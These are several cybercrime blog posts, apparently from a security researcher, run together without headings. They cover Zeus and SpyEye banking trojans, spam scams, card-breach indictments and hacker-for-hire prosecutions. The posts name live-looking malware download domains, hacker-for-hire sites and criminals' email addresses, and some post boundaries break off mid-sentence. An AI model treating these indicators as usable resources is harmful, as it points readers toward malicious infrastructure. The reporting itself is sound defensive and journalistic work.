On December 27, 2013, Malcovery's "Today's Top Threat" featured report was about a spam message that claimed to have an attached VoiceMail for you to listen to. Similar to today's malware distribution, a small Dropper/Downloader was used to download a copy of Zeus (in this case from the domains oilwellme.com and mistubishidehumidifiers.co.uk). (VirusTotal report - 11 of 48 AV products detected this at the time of our report.)

When we dumped memory for that copy of Zeus, we were surprised to see a very long list of Credit Unions! Please be sure to understand that we are not saying Zeus does not target "big banks" -- we still see the ANZ, Barclays, BBVA, BMO, CapitalOne, Chase, Citi, Discover, HSBC,

Police Credit Union www.policecu.com.au
SGE Credit Union cuviewpoint.net/mvpsge/
Swan Hill Credit Union cuviewpoint.net/mvpstmarys/
Woolworths Employees Credit Union
Encompass Transport Credit Union ibank.encompasscu.com.au
Family First Credit Union cuviewpoint.net/mvpfamilyfirst/
Goulburn Murray Credit Union www.policecu.com.au

I've pictured just a few of the targeted Credit Unions above, but there were more than FORTY credit unions just targeted in that single version of Zeus!

In today's "Wells Fargo Spam" version of Zeus, we had several other small brands targeted:

Vancouver City Savings Credit Bank vancity.com
Jefferson Bank of Missouri jefferson-bank.com
Nashville Citizens Bank nashvillecitizensbank.com
Elan Financial Services myaccountaccess.com
First Data StatementLook statementlook.com

Why are small brands targeted? Sometimes it may be because the malware delivery has been targeted to a particular geographic location where the small bank is prominent. More likely, it is because the criminals have some local resource in that location that is able to assist with money muling and "cashing out" compromised accounts.

Elan Financial Services is an interesting one. By targeting this portal, the criminals may be able to target the 1600 banks and 400 credit unions that a financial services company such as Elan may service through their portal. FirstData's StatementLook service is another targeted today, which also serves as an EBPP (Electronic Bill Payment & Presentation) allowing many smaller boutique credit card providers to off-load the electronic banking aspects of their service to a central location. Many other portals for online banking and financial services for smaller banks and credit unions can also be found from time to time in the Zeus Malware Configuration files (also known as ".BIN" files). For example, many small banks use the "NetTeller" service, or "MyCardStatement.com", or other types of Integration services, such as "FundsDirect.co.uk" which is a front end to 2300 different investment funds, all also targeted by today's Zeus.

Small Banks as Phishing Targets

First Convenience Bank (Texas) with phishing servers in Iran
First Niagara Financial Group with phishing servers in Pakistan
Buckeye Cable Systems with phishing servers in Poland and Sweden

Here's what the emails actually looked like.

Target Gift Card Spam

We've blogged about Gift Card spam and related malware on several occasions including:

• Cyber Monday 2010 - when we warned about scams using Victoria Secrets and Oliver Garden gift cards. In that scam you have to complete a series of "tasks" in order to earn your gift card, after going through several steps where you think you have "won" something. The final tasks back then were things like "Stay three nights in a Red Horse Inn hotel's luxury suite" or "buy a new car from General Motors!" but LONG before you found out about those tasks, the criminals already had your email, home address, cell phone number, and your agreement to let them share that data with other marketing firms.

• A Day in the Life of Spam (2009) - in that blog I tried to fully categorize 10,583 spam messages received on October 4, 2009. 28 of the emails were "Giveaway gotchas" -- gift cards, plane tickets, cell phones, laptops that you had "won" if you would just perform some tasks.

• We also told you about the Member Source Media LLC case where the FTC fined Chris Sommer $200,000 for running his spam scam where he sent email for "Free Products that Weren't Free".

So, today, I wasn't surprised to see spam with subjects and senders like these:

Here's what these usually look like (or at least the more high end ones):

Target Phish? Or is it?

So what happens if you click on the links in the email? Let's find out!

Here's the Fiddler capture of the redirect stream: So, clicking on the link where it says "Has your identity been stolen - CLICK HERE to check the database" or where it says "CHECK TO SEE IF YOUR IDENTITY HAS BEEN STOLEN - CLICK HERE NOW!" takes you through a chain of "automatically redirected" websites:

• www.mb01.com
• www.maxbounty.com
• khvx.secoptim.com
• rewardzone.surveyblogonlne.com

All of those numbers out next to the URLs? Those are the Affiliate Codes and Redirect Codes, so the scammers can make sure to direct you to the correct scam and to make sure the right spammer gets credit for his hard work stealing your time, money, and possibly identity.

and then your "Political Opinion Survey" starts up . . .

The Fine Print

rewardzone.surveyblogonlne.com is not sponsored by or affiliated with This Website. This Website has not authored, participated in, or in any way reviewed this advertisement or authorized it. The trial products offered on the last page pay this website for leads generated. *Free trial offers may require shipping and handling. See manufacturer's site for details as terms vary with offers.

You'll also want to pay special attention to

How Do We Use The Personal Information?

How Do We Use The Personal Information?

We may use the Personal Information for any legally permissible purpose in our sole discretion Ad Serving Companies

We may use third party ad networks or ad serving companies to serve advertisements on our websites. We may pass the Personal Information about you to these companies so that they can deliver targeted advertisements that they believe will be of interest to you. The information passed to these companies may include, but is not limited to, your IP address, e-mail address, name, mailing address, telephone number, date of birth, gender, and any other information you provide to us. Web pages that are served by these companies will be subject to their own applicable privacy policies, if any.

Marketing Partners

We may share, license or sell your Personal Information to third parties for various marketing purposes, including their online (e.g., e-mail marketing) and offline (e.g., telemarketing, cell phone text messaging, skip tracing, and direct mail) marketing programs.

Back to the Survey

After it "calculated my eligibility" it asked me for my email address. I accidentally hit "Back" then and now it is begging me not to go!

Oh goodie! More prizes!

But wait! We ALWAYS read the fine print!

Got that? You must complete 2 silver, 2 gold, and 8 platinum offers ... WITHIN ONE CALENDAR DAY! So, it's 6:00 PM for me now, so I have 6 hours to do all the offers, or I get NOTHING.

In case the website goes down later, here's a local copy of some of the "example offers" that you have to finish TODAY!

OK? Let the Privacy Rape Begin!

OK, you get the point. . . I have 12 more questions to go . . .

• Are you currently employed full time?
• Are you interested in continuing your education?
• Do you have health insurance?
• Do you ever pay out of pocket for prescription drugs?
• Do you smoke?
• Does anyone at your home suffer from Asthma?
• Back Pain?
• Diabetes?
• Joint Pain?
• Sleep Apnea?
• Anxiety or Depression?
• Have you had a colonoscopy?

And, THAT, Ladies and Gentlemen, is How you get a Free $1000 Target Gift Card, except they actually plan to give me a $150 WalMart gift card instead . . . *IF* I complete 2 Silver, 2 Gold, and 8 Platinum tasks.

$1000 Target Gift Card? No Thank You!

Back in August of 2008 this blogger, like so many others, was focused on Albert Gonzalez after the TJX Arrests were made. Attorney General Michael Mukasey said that the message from the arrests was that if you do Data Breaches We Will Arrest You, and We Will Send You To Jail!. We followed up that post with a deeper look at two sets of indictments issued at the same time, TJX Update: The Boston Indictments and TJX Update: The San Diego Indictments. (The San Diego ones included the famous hackers Aleksander Suvorov, AKA JonnyHell from Estonia, and Maksym Yastremskiy, AKA Maksik). Maksik and JonnyHell were part of the Dave & Busters Point-of-Sale terminal hacks indicted in May 2008.( 23 page Dave & Busters Indictment against Maksik and JonnyHell)

In the Gonzalez case, it was mentioned that his gang had targeted "at least nine major retail corporations: including the TJX Corporation, whose stores include Marshalls and TJ Maxx; BJ's Wholesale Club; Barnes and Noble; Sports Authority; Boston Market; Office Max; Dave & Buster's restaurants; DSW shoe stores; and Forever 21."

But what is perhaps most important is that when it comes to gangs stealing millions of credit cards, there are no one-man operations, or even ten-man operations. These type of breaches are pulled off by crews. We learned much more about Gonzalez's crew in the recently unsealed documents from the case against Vladimir Drinkman, Aleksandr Kalinin, Roman Kotov, Mikhail Rytikov, and Dmitriy Smilianets. The order to Unseal the Drinkman et. al. case was only given on December 17, 2013. Several items on the docket remain sealed to this day, but one of special interest was the Second Superseding Indictment, which has been unsealed, although several points remain redacted.

Here's what we learn in the Drinkman indictment.

• Drinkman resided in or near Syktyvkar and Moscow, Russia, and was "a sophisticated hacker, who specialized in penetrating and gaining access to the computer networks of multinational corporations, financial institutions, and payment processors; harvesting data, including, among other things, credit card, debit card, and other customer account information, from within the compromised networks; and exfiltrating that data out of the compromised networks.
• Kobov resided in or near Moscow, Russia, and "specialized in harvesting data from within the computer networks that Drinkman and Kalinin had penetrated, and exfiltrating that data.
• Co-conspirators named in the indictment include Albert Gonzalez (segvec), Damon Patrick Toey, and Vladislav Anatolievich Horohorin (BadB).
• The hacking conspiracy is described as "a prolific hacking organization""responsible for several of the largest known data breaches" and that it operated "from August 2005 through at least July 2012."

• NASDAQ - (from at least May 2007 - SQL Injection lead to malware that extracted login credentials from databases)
• 7-Eleven - (at least August 2007 - SQL Injection lead to malware that extracted card data from databases)
• Carrefour S.A - (2 million credit cards - October 2007 - SQL injection lead to malware that extracted card data from databases)
• JCPenney - (October 2007 - SQL Injection lead to malware placed on the network that extracted card data from databases)
• Hannaford Brothers - (4.2 million credit cards - November 2007 - SQL Injection lead to malware placed on the network that extracted card data from databases)
• Heartland Payment Systems (130 million card numbers, estimated losses of $200 Million - December 2007 - SQL Injection lead to malware placed on the network that extracted card data from databases)
• Wet Seal - (January 2008 - SQL Injection lead to malware placed on the network that extracted card data from databases)
• Commidea Ltd. - (30 million Credit cards - March-November 2008 - malware was used to extract card data and exfiltrate the data)
• Dexia Bank Belgium - ($1.7 Million loss - February 2008 to February 2009 - SQL Injection resulted in malware placed on the network that exfiltrated card data)
• JetBlue Airways - (Jan 2008 - February 2011 - malware placed on network exfiltrated Personal Data of employees)
• Dow Jones, Inc. - (2009 - at least 10,000 sets of Log-In Credentials stolen via malware placed on network)
• "Bank A" - (Dec 2010 to March 2011 - malware placed on an unnamed bank HQ'ed in Abu Dhabi, United Arab Emirates used to facilitated theft of Card Numbers.)
• Euronet - (2 million cards - July 2010 to October 2011 - SQL injection lead to malware that extracted login credentials from databases.)
• Visa Jordan Card Services - (800,000 cards - Feb 2011 to March 2011 - SQL Injection lead to malware placed on network that exfiltrated card data.)
• Global Payment Systems - (950,000 cards - $92.7 Million in losses - January 2011 to March 2012 - SQL Injection lead to malware placed on network that exfiltrated card data.)
• Diners Club International, Singapore - (500,000 Diners Credit cards - $312,000 in losses - June 2011 - SQL Injection lead to malware placed on network that exfiltrated card data)
• Ingenicard US, Inc. - ($9 million in 24 hours - March 2012 to December 2012 - SQL Injection resulted in malware placed on the network that was used to facilitate ATM withdrawals.)

Given what is known about these previous attacks, might it be reasonable to consider that the Target breach may also be related?

Given the similarity in methods used in ALL of the cases above, what "Lessons Learned" might we hope other retailers and large network owners might be observing?

That's the focus of our latest Malcovery White Paper - "Target Hacker Tools Provide Breach Insight". I hope you'll take a chance to review it.

This was based on their January 2013 survey, covering experiences for American consumers in 2012. Hopefully we'll have the next year of data in a couple months (it is usually published in their June issue.

Their Lead Article was on Smart Phone security, which found:

• Half of all American homes have a Cell phone
• 7.1 Million had their phone Lost, Stolen, or Broken beyond Repair
• 69% of Americans don't back up their smart phones
• 64% do not use a password or screen lock!
• Only 8% use "Remote Wipe", 22% use a "Phone Finder", and 15% use Anti-virus

"Click to see Consumer Reports InfoGraphic"

This article -- How Safe is your Home Computer? found:

• 43% report being afflicted by "Heavy Spam"

  I really want to call attention to that number, because so many of my computer security friends are calling spam a "solved problem". That is ABSOLUTELY NOT the experience of the average American. Perhaps companies using the best state of the art technology are experiencing reduced volumes of spam, but 43% of Americans report they are still experiencing "Heavy Spam!"

• 9.8 Million adults had Facebook trouble

  Either accounts taken over by an unauthorized person, had their reputation harmed, or were harassed, threatened, or defrauded.

• 58.2 Million users had Malware issues

  to an extent that their computer's features or performance were impacted, costing $3.9 Billion in direct repairs and clean-up costs. 5% of them had to take their computer to a third party to have it repaired! I especially like the way that Consumer Reports asks this question. We know that Symantec says 18 computers are infected by new malware EVERY SECOND with a global cost of $110 Billion per year, but the question CR asks here is "How many of those infections actually lead to a real problem for the consumers?"

• 9.2 million gave up personal data on Phishing sites

  Hundreds of thousands actually lost money from a bank account as a result. Among the big-name companies whose names successful phishers used most often, according to Consumer Reports: Bank of America, Chase, Facebook, PayPal, and Visa.

This article -- Protect Credit Cards from Scams mentions that their survey found:

• Nearly 20 million credit-card fraud victims

  19.5 million consumers with Unauthorized charges on their cards

  CR Tip to Protect yourself: Report fraudulent charges immediately. If credit was used instead of debit on a bank card, you're probably liable for up to only $50. (That limit doesn't apply to debit charges.)

• Lost, hijacked, stolen

  18.4 million consumers were notified by Companies, government agencies, or other organizations that their personal info had been lost, hijacked, or stolen.

  CR Tip to Protect yourself: If notified of a data breach, use the free credit monitoring that's usually offered. Add a fraud alert to your credit reports. Close affected accounts and change passwords on others. Check for incorrect charges or withdrawals after the breach.

• Personal data compromised

  10 million consumers lost money from an account (other than credit card), had personal data used for a fraudulent purpose, or had a new credit account opened in their name by an unauthorized person.

  CR Tip to Protect yourself: Don't click on links or open attachments in e-mail purporting to be from government agencies. Have your bank alert you to possible fraudulent activity.

IsAnyoneUp.com & email account hacking

According to a Hunter Moore indictment shared by WIRED Magazine's ThreatPost, beginning in October 2011 Hunter hired Charles Evens to begin hacking into women's email accounts looking for nude photos and sending them to Moore for his website. The indictment charges the pair with:

• 18 USC § 371: Conspiracy
  57 Overt Acts of the conspiracy, including orders and payments for hacking, the hacking itself, and the uploading of stolen images are listed from October 2011 to March 2012.
• 18 USC § 1030(a)(2)(C) & (c)(2)(B)(i): Unauthorized Access to a Protected Computer to Obtain Information 8 specific hacks against Google's email servers are listed from December 2011 to January 29, 2012.
• 18 USC § 1028(a)(1): Aggravated Identity Theft 7 individuals are listed whose "means of identification" were used "during and in relation to felony violations" ... "to obtain information for private financial gain" (Aggravated Identity Theft carries a mandatory +2 years sentence.)
• 18 USC § 2: Aiding and Abetting and Causing and Act To Be Done

Evens received his payments via an anonymous PayPal account set up for this purpose.

(For more on Email Hacking, be sure to see our story: Unprecedented International Cybercrime Cooperation Nabs Email Hackers.)

UGotPosted.com & Extortion

• 182(a)(1) - Conspiracy
• 530.5(a) - Identity Theft
  to willfully obtain someone's personal identifying information, including name, age and address, for any unlawful purpose, including with the intent to annoy or harass *AND* to obtain credits, goods, or services via the identity of another.
• 520 - Extortion
  to receive money via a threat
• 519 - Extortion via exposing or imputing disgrace or exposing a secret affecting the victim

A 22 page Arrest Warrant also gives great detail including the sworn testimony of the investigating officer, and statements from a Legal Analyst in the eCrime Unit of the Attorney General's office, who took interest in the case after identifying 25 California residents who were documented on the site. Many of the 14 Jane Does interviewed stated that their cell phone number, street address, Facebook page, Twitter account, LinkedIn profile, and dating website profiles were shared as people commenting on the pictures seemed to make sport out of finding and sharing additional personal details about the individuals depicted. Several reported being approached in person, including one woman who had her cell phone stolen from her to obtain additional photographs from her phone. When the Attorney General's investigator spoke to Bollaert by telephone he attempted to learn an address where a subpoena could be served. Bollaert replied he was "staying off the grid" and terminated the phone call.

One of the most interesting emails in the arrest warrant to me was a reproduction of the email from CloudFlare on October 18, 2012:

The name servers for changemyreputation.com have been updated and changemyreputation.com has been added to your CloudFlare account. CloudFlare is now accelerating and protecting your website. We are also gathering cool stats on your site, so check the reports & stats section at https://www.cloudflare.com/my-websites.html.

Email Hacking in China, India, Romania

The CBI on Friday arrested a 32-year-old techie from Pune after a tip-off from the Federal Bureau of Investigation (FBI) about a racket involving hacking of 900 e-mail accounts belonging to people from across the world, including Americans and Indians. [...] Following the FBI tip-off, the CBI carried out raids in Ghaziabad, Mumbai and Pune during which several professional hackers were rounded up. Tiwari was arrested and taken on transit remand to Delhi by the CBI team. His computers and other gadgets were seized. According to the CBI, the e-mail accounts of 171 Indians and more than 700 foreign nationals, including Americans, had been hacked. [...] The agency said the raids were part of a coordinated action involving the agencies of China, Romania, the US and India. This was the first time the CBI had tied up with international investigation agencies to launch an operation against cyber crime in India.

The confusion was over the fact that the FBI had decided to not unseal the cases in the US related to these crimes until they received confirmation from their peers in India, Romania, and China that the others involved in the case had been successfully arrested. Once that was concluded, we were able to find the original announcement, January 24, 2014, from the US Attorney's Office in the Central District of California, International Law Enforcement Efforts Result in Charges Around the World Against Operators and Customers of E-Mail Hacking Websites.

• Mark Anthony Townsend, 45, of Cedarville Arkansas and
• Joshua Alan Tabor, 29, of Prairie Grove Arkansas were charged with a felony violation for running "needpassword.com". Customers of their service would provide an email account and make payment via PayPal once the email password was obtained. More than 6,000 email accounts were hacked during this scheme.

Three additional US persons were charged, but these were charged with the lesser misdemeanor charges related to hiring a hacker (as opposed to the two above, who did the hacking themselves):
• John Ross Jesensky, 30, of Northridge, California, paid $21,675 to a Chinese website to obtain email account passwords.
• Laith Nona, 31, of Troy, Michigan, paid $1,081 to obtain email account passwords.
• Arthur Drake, 55, of Bronx, New York, paid $1,011 to get email account passwords.

The Romanian DCCO (Direcţiei de Combatere a Criminalităţii Organizate or Directorate for Combating Organized Crime) part of the DIICOT, searched the residences and arrested four individuals associated with the hacker for hire websites:

• zhackgroup.com
• spyhackgroup.com
• rajahackers.com
• clickhack.com
• ghostgroup.org (since at least September 2006!)
• e-mail-hackers.com

Romanian Email hacker, Guccifer

Based so far only on the coincidence of timing, this blogger believes that this was the notorious "Guccifer" or Marcel Lazar Lehel, who was previously charged with a suspended sentence of three years (February 8, 2012) for hacking into email accounts belonging to SRI director George Maior, former US state secretary Colin Powell, members of Bush and Rockefeller families and officials of the Obama administration. See for example the January 22, 2014 story in Romania's Nine O'Clock news, "Hacker 'Gucifer' caught in Arad" -- www.nineoclock.ro/hacker-“guccifer”-caught-in-arad/. In another story from digi24.ro (via Google Translation) it says:

[In addition to] SRI boss George Major, George Bush, and Colin Powell, Other victims of 'Guccifer' were actor Steve Martin, John Dean, former advisor to President Richard Nixon, actress Mariel Hemingway, three members of the House of Lords in the UK, Laura Manning Johnson, a former CIA analyst, George Roche was Secretary of the Air Force, and President MetLife (insurance company).

Indian Email hacker, Amit Tiwari

HireHacker's homepage
HireHacker.net was a prolific advertiser of their services since 2007, creating many "blogs" (such as freelancehackers.wordpress.com) and posting questions on places like Yahoo Answers like "Can the Famous Internet Detectives at HireHacker.net really recover my cheating spouses email password?"

Chinese Email hacker, Ying Liu

Liu's website had it's fifteen minutes of fame when it was featured in NYMag's story Hiring Hackers is Super Cheap. In that story from January 2012, two Kuwaiti brothers, Bassam Alghanim being the billionaire of the two, hired some Chinese hackers "for the price of a really good dinner" to break into his brother's email account. That story indicated that the hackers earned $200,000 in thirteen months by breaking into accounts. The story was also covered in the Wall Street Journal (which also has a video from Cassell Bryan-Low about the case), where the actual hacking may have been via Invisible Hacking Group instead.

Ying Liu hosted his website, hiretohack.net, on the notorious Malaysian hosting platform, Piradius.net. Here are some screen shots of HireToHack.net that show how their system worked:

Homepage
Menu of Services
Order Placement
This is such an amazing demonstration of international cooperation! I know I already said so, but for India's CBI, China's MPS, Romania's DCCO, and the FBI to cooperate together on a single case is without precedence! A great sign towards a bad future for cyber criminals!

In December 2013 it appeared that Vega, who had been in custody since 2003, was finally about to be sentenced. Vega was originally arrested while traveling in Cyprus and is said to have had in possession at the time of his arrest information on more than 500,000 credit card accounts. The New York court sentenced him December 18, 2013, but then it was time to find out what would happen in California.

On January 22, 2014, the Honorable Charles R. Breyer, Senior United States District Judge accepted Vega's plea bargain and in exchange for pleading guilty to 18 USC 1343 and 2, "Wire Fraud, Aiding and Abetting" (Counts 1-20), Counts 21-40 of his original charges were dismissed.

Boa was sentenced (by this Judgement Against Roman Vega document) to serve forty-six (46) months on counts one through twenty, all counts to be served concurrently, and also to be served concurrently with Docket #07-CR-707 (ARR) from the Eastern District of New York.

Vega will also have to pay restitution as follows:

• Bank of America - $23,371.86
• Bank of Cyprus - $92.63
• Canadian Imperial Bank of Commerce - $681.56
• Capital One - $15,039.56
• Chase Bank - $16,223.74
• Citibank - $29,284.42
• Fla Card Services - $7,695.04
• JP Morgan Chase - $1,849.27
• Merrill Lynch Fraud Control - $6,118.54
• National City Card Services - $614.84
• PNC Bank - $3,144.92
• Royal Bank of Canada - $488.49
• USAA Federal Savings Bank - $89,294.75
• Wachovia Bank - $13,303.35
• Washington Mutual Bank - $12,525.60

The early court documents in the Boa case, including this Roman Vega Criminal Complaint from 2007 (25 page PDF) make fascinating reading, walking through how a dispute on the ShadowCrew Carding Site between Boa and others on the site that lead Boa to spawn his own website, www.boafactory.to. Boa worked closely with other famous carders, including Gollum and Script.

Roman Vega (Boa) was arrested February 26, 2003 in Nicosia, Cyprus. his laptop was imaged and shared with the US Secret Service and the US Postal Inspection Service, which revealed hundreds of email messages and thousands of pages of ICQ chats. The laptop also had 500,000 credit cards issued by 7,000 different financial institutions! Vega was flown from Cyprus to Minneapolis, Minnesota on June 3, 2004. He plead guilty in November 2006 to twenty counts of wire fraud in the Northern District of California. One of the especially interesting chats was between ICQ 107711 (Vega) and ICQ 100630 (Script) where Vega claims his "boys" have cracked a database containing 2 million credit card accounts in the United States. Script and RyDen said that was too large a volume for them to handle. Later Script sent an article about the hack to Vega about a breach against Data Processors International (DPI).

Although the court documents do not specify which article it was, it may have been this CNN article Hacker hits up to 8M credit cards. Vega confesses to Script that the article is wrong - they actually got 14 million cards, including 450,000 just from Capital One!

Boa was arrested after a large number of cards from the breach were found to be used at a particular POS terminal in Cyprus.

Now, if you'll forgive me, we'll go back to the New York case. Things did not go well for BOA in New York. He insisted on dismissing his counsel, who he did not trust, and defending himself, which did not go well. Vega had a limited command of English and his defense seemed to be a mix of magazine articles, things other prisoners told him and watching too much television. Here's one example transcript from a hearing where he is trying to say that he wants access to thirty boxes worth of notes and files, including everything the government found on his hard drive.

According to the sentencing memorandum from the US, Script was Dimitry Golubov, the Godfather of CarderPlanet. But Boa played a key role in making CarderPlanet the "go to place" for cards. It was Boa who instituted the "Card Review" process by which vendors had to ensure that their cards were original and had not been previously sold. The vendor ranking system, copied to so many other boards today, originated on CarderPlanet, and it was Boa's key contribution to the new system.

More than half of the sentencing memo from the US lists the many ways in which Vega misbehaved and violated his agreements to cooperate with the US in exchange for leniency. These include:

• having a letter sent from Italy to the private unlisted address of a government analyst that insulted Vega by saying he no longer had contact or influence in the criminal world.
• sending money to his girlfriend and then "not being able to recall" anything about that when asked repeatedly by the government.
• consulting on Misha Glenny's book "Dark Market: Cyberthieves, CyberCops and You".
• withdrawing his guilty plea
• having a powerful cell phone antenna in his cell. Although no phone was ever found, Vega was somehow
• able to maintain several blogs about his life in prison, despite theoretically having no access to computers or phones.

Here is the sentencing "point calculator" used in the case:

To show consistency with the sentence, the New York Sentencing Memo (10MB PDF) also lists previously sentenced carders and hackers and their respective sentences as a means of justifying the requested sentence:

1. Albert Gonzalez - 20 years (sentenced September 11, 2009)

2. Edwin Pena - 10 years and $1M restitution (sentenced September 24, 2010)

3. Lin Mun Poo - 10 years (sentenced November 4, 2011)

4. Tony Perez - 14 years (sentenced September 9, 2011)

5. Jonathan Oliveras - 12 years (sentenced December 9, 2011)

6. Adriann-Tiberiu Oprea - 15 years (sentenced for hacking into 800 US Merchants' systems resulting in $17.5 million in unauthorized charges on more than 100,000 cards.) Oprea was known as "the Subway Hacker" for stealing card data from hundreds of Subway restaurants.

(to read about other famous hackers and their sentences, see Major Achievements in the Courtroom.)

In New York 1:07-cr-00707-ARR, Vega was sentenced to 216 months for Count One and 90 months on Count two, to run concurrently for a total of 216 months or 18 years. Since that is longer than the California sentence, he'll pay the California restitution and serve the 18 years courtesy of the Bureau of Prisons in Lompoc.

But BX1 was only one of the people behind SpyEye. Today the US Attorney in the Northern District of Georgia announced Cyber Criminal Pleads Guilty to Developing and Distributing Notorious SpyEye Malware referring to Aleksandr Andreevich Panin, AKA Gribodemon AKA Harderman, who has confessed to conspiring with BX1 (Hamza Bendelladj) to advertise, sell, and distribute SpyEye to at least 150 people who paid between $1000 and $8500 for their copy of SpyEye. The indictment used is actually the EXACT SAME INDICTMENT as what I shared with the BX1 case, with the exception that this time, nothing is blacked out pending future charges. Interesting BX1, the "co-conspirator" has plead NOT GUILTY. According to US Attorney Sally Quillian Yates, SpyEye was used to infect more than 1.4 million computers in the US and abroad. Yates has a message for Cyber criminals: "You cannot hide in the shadows of the Internet. We will find you and bring you to justice." Panin suffered the same fate as BX1. He traveled and got picked up crossing borders. For Bx1 the arrest was in Thailand. Although an Algerian native, Bx1 was living in Malaysia and was arrested in Thailand while traveling to Egypt. For Panin, a vacation in the Dominican Republic was what brought him down. These "border crossing" arrests have led the Russian government to issue a rather strange travel advisory: "If you are wanted for crimes in the United States, don't visit Extradition Friendly Countries!" (See Russia Issues Travel Warning

The case was made possible with yet another truly International show of cooperation, including the UK's National Crime Agency, the Royal Thai Police, the Dutch National High Tech Crime Unit, the Dominican Republi's Departmento Nacional de Investigaciones (DNI), the Cybercrime Department of the State Agency for the National Security in Bulgaria, and the Australian Federal Police. On the private sector side, Trend Micro's Forward-Looking Threat Research (FTR) Team, Microsoft's Digital Crimes Unit, Mandiant, SecureWorks, Trusteer, and Underworld.no (a Norwegian Security Research Team) all made valuable contributions to the research and information sharing behind this case as well.

(Panin pictured above)

As an example of the types of support provided by the public sector, Microsoft investigators, working with the help of the greater security research community, provided in their affidavit's example chats, logs, forum posts, and addresses for John Doe 3, who they called Harderman and Gribodemon. Those hints include "Exhibit 5" which shows Harderman and Gribodemon claiming to be the author of SpyEye, Exhibit 13, an interview with Gribodemon where he claims to be the author, and several email and messaging addresses for Gribodemon, including:

shwark.power.andrew@gmail.com, johnlecun@gmail.com, gribodemon@pochta.ru, glazgo-update-notifier@gajim.org, and gribo-demon@jabber.ru.

Also in the Microsoft Exhibits are the proof that there was a discussion about merging Zeus and SpyEye (see Exhibits 14, 15, 16, 17, and 18.

Several of those forum posts are from the forum "OpenSC.ws" which was well known as a place for buying and selling trojans.

Exhibit 5 is actually a post from the Krebs on Security website called SpyEye v. ZeuS Rivalry Ends in Quiet Merger and includes this post from Harderman:

Good day!

I will service the Zeus product beginning today and from here on. I have been given the source codes free of charge so that clients who bought the software are not left without tech support. Slavik doesn’t support the product anymore, he removed the source code from his [computer], he doesn’t sell [it], and has no relationship to it. He also doesn’t conduct any business on the Internet and in a few days his contact [information] will not be active.

He asked me to pass on that he was happy to work with everyone. If you have any unresolved issues remaining [there is a] request to get in touch with him as soon as possible.

All clients who bought the software from Slavik will be serviced from me on the same conditions as previously. [I] request that [you] come directly to me regarding all issues.

Thanks to everyone for [your] attention!

For a very approachable explanation of how Zeus and SpyEye work, I recommend the article The New Frontier for Zeus & SpyEye by Ryan Sherstobito (formerly with Panda Security) in the September 2011 issue of the ISSA Journal.

Panin (and Bendelladj) were charged with:

Conspiring to: (A) intentionally access a computer without authorization and exceeding authorization, and thereby obtain or attempt to obtain information from a protected computer, and the offense was committed for the purpose of private financial gain, in violation of Title 18, USC Sections 1030(a)(2)(C) and 1030 (C)(2)(B)(i);

(B) knowingly and with intent to defraud access a protected computer without authorization and exceeding authorization, and by means of such conduct further the intended fraud and obtain things of value, in violation of Title 18, USC, Sections 1030(a)(4) and 1030(c)(3)(A); and

(C) knowingly cause the transmission of a program, information, code, and command, and, as a result of such conduct, intentionally cause damage and attempt to cause damage without authorization to a protected computer, and the offense caused and would, if completed, have caused damage affecting 10 or more protected computers during a one-year period, in violation of Title 18, USC, Sections 1030(a)(5)(A) and 1030(c)(4)(B).

SpyEye has been stealing login credentials for bank accounts, credit cards, and FTP accounts since at least January of 2010, when one of the first mentions was listed in the NoVirusThanks Blog post "A new sophisticated botnamed SpyEye is on the market". An analysis of SpyEye performed on those very early samples by Jorge Mieres of Malware Intelligence (Sorry Jorge, the document link on your page is broken!) reveals a couple interesting details. For example, here is a network capture showing that the bot being analyzed is going to make a connection to SecureAntiBot.net.

Using DomainTools historical WHOIS information, we can see that the registrant for SecureAntiBot.net is Hilary Kneber! At about that time, Hilary Kneber was the most famous registrant of malware domains we knew of, and demonstrated the fact that a single criminal could CERTAINLY be using many bots. Check out the MalwareDomainList.com entries for Hilary Kneber:

(A fuller list of 149 additional domains is available at the end of this article as Hilary Kneber Malware Domains)

One especially interesting Hilary Kneber attack was one that pretended to be a Christmas Card from the White House which was broadly disseminated to members of Government and the Military Intelligence apparatus. That version of Zeus, which this researcher also saw targeting government employees and exfiltrating stolen documents to Belarus, was so prominent that NetWitness dubbed the botnet "The Kneber Bot" and claimed that 75,000 computers in 2,500 companies had been used to exfiltrate out at least 75GB of data. (See Feb 2010 ComputerWorld article Over 75,000 systems compromised in cyberattack

S21 has a fantastic graphic on their blog that shows the Zeus Family Tree:

(Right-Click "view image" to see full graphic)

See the lavender line near the bottom that says "Source to Gribodemon?" Gribodemon is Panin. The origins of the SpyEye plugin are widely believed to have come from the original Zeus author announcing his retirement and passing all of the Zeus sourcecode to SpyEye and might have anticipated that the code would be used to improve SpyEye.

At that time, the biggest difference between Zeus and SpyEye was the price! While Zeus was being sold for $1000 per copy, SpyEye was only charging $500 and had all of the same features, including some nice features such as Root Kit features that prevented any usermode process from being able to see the file in Task Manager or being able to see any of the Registry Keys created by the bot.

The main feature that started the "battle of the bots" was the little check box below: "Kill Zeus"

If the "Kill Zeus" option was selected in the builder, the resulting exe file would search for an existing Zeus install on the newly infected SpyEye bot node and destroy it.

Brian Krebs documented the rising tensions between SpyEye and Zeus in his article SpyEye vs. Zeus Rivalry

Zeus, Gribodemon, and SpyEye

A screenshot of the Spy Eye control panel from November 8, 2011 is provided here, (Image from an analysis by Xylitol, who is credited with "cracking" SpyEye and thereby depriving Gribodemon of his revenue stream. Everyone thought that once SpyEye was cracked a "New & Improved" SpyEye would be released, but this really marked the fall of SpyEye.

IOActive also did a great analysis and reverse engineering report on SpyEye called Zeus SpyEye Banking Trojan Analysis that goes into great technical detail about how the malware injects itself into processes, avoids "API Hooking" traps and hides its own presence on the machine in a way that was much more advanced than Zeus.

On August 9, 2011, Xylitol released a report called Cracking SpyEye 1.3.x. Xylitol AKA Steven K. is/was a member of RED Team - the Reverse Engineer Dream Team. As a direct result of this crack, which allowed people to "unbrand" their purchased copy of SpyEye, the original creators and marketers of the tool were no longer necessary to establish an instance of SpyEye. While it briefly seemd that this would to a great surge in use, it actually killed the product.

